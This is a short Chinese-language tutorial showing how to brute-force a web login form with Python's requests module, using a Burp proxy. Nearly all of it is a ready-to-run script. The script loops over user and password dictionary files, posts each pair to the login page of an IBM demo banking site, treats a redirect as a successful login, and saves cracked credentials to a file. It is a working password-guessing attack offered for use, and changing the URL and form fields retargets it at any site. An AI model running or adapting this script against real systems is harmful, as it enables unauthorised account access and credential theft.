python 的 http 中 request模块在web 表单爆破的使用方法
request模块中代理的使用方式
request 模块是http 中比较全的模块,简单易用,比之前文章中使用的 httplib,urllib,urllib2都要好用.可以替换为request 的 session 方法.
# -*- coding: utf-8 -*-
import requests
outFile = open('accounts-cracked.txt', 'w')
def brute_force(user, password):
name = user.strip()#strip() 方法用于移除字符串头尾指定的字符(默认为空格)
passwd = password.strip()
proxy = {"http":"127.0.0.1:8080"}
#添加代理:本地8080端口的代理是 burp 工具,主要是查看脚本发包回包的情况,好定位问题,如果是 https 网站使用proxy = {"https":"127.0.0.1:8080"}
url = "http://demo.testfire.net/bank/login.aspx" #IBM 公司的一个 测试网站
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
header = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}
data = {'uid': name, 'passw': passwd,'btnSubmit':'Login'}
response = requests.post(url,headers=header,proxies=proxy,data=data,allow_redirects=False)
code = response.status_code
if code == 302 or code==301:
print '+++++ find user:', name, ' with password:',passwd, '+++++'
outFile.write(name + ':' + passwd+'\n' )
else:
print '----- error user:', name, ' with password:',passwd, '-----'
return
if __name__ == '__main__':
with open('user.dic', 'r') as userline:
y = userline.readlines()
with open('pass.dic', 'r') as passline:
b= passline.readlines()
for u in y:
for p in b:
brute_force(user=u,password=p)
outFile.close()
with open('accounts-cracked.txt','r') as text:
list = text.readlines()
sum=len(list)
if sum>0:
print "找到",sum,"个账号密码"
else:
print "All thread OK,maybe not "